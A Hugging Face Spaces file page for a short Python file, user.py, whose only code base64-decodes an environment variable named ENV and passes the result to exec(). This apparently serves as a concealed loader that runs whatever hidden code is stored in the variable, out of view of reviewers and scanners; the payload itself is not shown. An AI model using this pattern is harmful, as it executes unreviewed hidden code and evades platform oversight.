Hugging Face
Models
Datasets
Spaces
Community
Docs
Enterprise
Pricing
Log In
Sign Up
Spaces:
Duplicated from
Zhofang/awf
Zhofang
/
awk
like
0
Running
App
Files
Files
Community
Fetching metadata from the HF Docker repository...
045198b
awk
/
user.py
Zhofang
Rename user (5).py to user.py
6c8a768
verified
11 months ago
raw
Copy download link
history
blame
Safe
76 Bytes
import
os
import
base64
ENV = os.environ[
'ENV'
]
exec
(base64.b64decode(ENV))